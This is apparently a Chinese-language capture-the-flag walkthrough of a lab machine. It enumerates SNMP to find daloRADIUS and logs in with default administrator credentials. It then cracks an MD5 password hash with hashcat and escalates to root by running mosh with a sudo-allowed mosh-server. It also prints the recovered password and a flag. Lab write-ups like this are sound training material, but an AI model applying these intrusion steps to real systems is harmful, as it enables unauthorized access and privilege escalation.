扫到22、80端口

image-20250110002056910

dirseach扫不出啥

image-20250110015335778

nmap扫一下udp端口,发现开放161端口,snmp v1v2服务

  • -A 选项获取目标主机的详细信息,包括操作系统、服务版本、脚本扫描等。

  • -sV 获取服务版本信息。

  • -Pn 跳过主机发现,直接对目标进行扫描。

  • -sU 扫描目标主机的 UDP 端口。

image-20250110012910242

使用snmpwalk扫一下,发现关键信息daloradius

image-20250110015702023

检索一下发现lirantal/daloradius: daloRADIUS is an advanced RADIUS web management application for managing hotspots and general-purpose ISP deployments. It features user management, graphical reporting, accounting, a billing engine, and integrates with OpenStreetMap for geolocation. The system is based on FreeRADIUS with which it shares access to the backend database.

检索一下index.php,发现daloradius/app/users/index.php等几个路由

image-20250110021831227

到达登录页面,找一下默认初始密码尝试登录,md账户密码错误

image-20250110022126659

Installing daloRADIUS · lirantal/daloradius Wiki

  • 用户名:administrator
  • 密码:radius

image-20250110022638740

发现还有其他登录页/daloradius/app/operators/login.php

image-20250110023010625

成功登入

image-20250110023343077

翻一翻发现最有用的信息就是这个Users了

image-20250111235028175

hashcat爆破一下

echo 412DD4759978ACFCC81DEAB01B382403 > hash
hashcat -m 0 -a 0 hash /usr/share/wordlists/rockyou.txt

image-20250111231001496

underwaterfriends

尝试ssh

image-20250111234548121

image-20250111235057858

像之前起点一样,sudo -l看一下当前用户可以执行的 sudo 命令的选项,发现mosh-server可以sudo

image-20250112014502043

mosh用于ssh,mosh-server服务端

svcMosh@underpass:~$ mosh-server -h
Usage: mosh-server new [-s] [-v] [-i LOCALADDR] [-p PORT[:PORT2]] [-c COLORS] [-l NAME=VALUE] [-- COMMAND...]
svcMosh@underpass:~$ mosh -h
Usage: /usr/bin/mosh [options] [--] [user@]host [command...]
        --client=PATH        mosh client on local machine
                                (default: "mosh-client")
        --server=COMMAND     mosh server on remote machine
                                (default: "mosh-server")

        --predict=adaptive      local echo for slower links [default]
-a      --predict=always        use local echo even on fast links
-n      --predict=never         never use local echo
        --predict=experimental  aggressively echo even when incorrect

-4      --family=inet        use IPv4 only
-6      --family=inet6       use IPv6 only
        --family=auto        autodetect network type for single-family hosts only
        --family=all         try all network types
        --family=prefer-inet use all network types, but try IPv4 first [default]
        --family=prefer-inet6 use all network types, but try IPv6 first
-p PORT[:PORT2]
        --port=PORT[:PORT2]  server-side UDP port or range
                                (No effect on server-side SSH port)
        --bind-server={ssh|any|IP}  ask the server to reply from an IP address
                                       (default: "ssh")

        --ssh=COMMAND        ssh command to run when setting up session
                                (example: "ssh -p 2222")
                                (default: "ssh")

        --no-ssh-pty         do not allocate a pseudo tty on ssh connection

        --no-init            do not send terminal initialization string

        --local              run mosh-server locally without using ssh

        --experimental-remote-ip=(local|remote|proxy)  select the method for
                             discovering the remote IP address to use for mosh
                             (default: "proxy")

        --help               this message
        --version            version and copyright information

Please report bugs to mosh-devel@mit.edu.
Mosh home page: https://mosh.org

--server=COMMAND可以用于指定远程的mosh-server服务,默认是mosh-server

mosh 127.0.0.1
mosh --server="mosh-server" 127.0.0.1
#以上两种相同

mosh-server是可以sudo使用的,如果--server指定远程服务端为sudo版mosh-server,是否可以提权root呢?

mosh --server="sudo mosh-server" 127.0.0.1

image-20250112022549807

9290acda8a407b44cc0ff956e1b2d870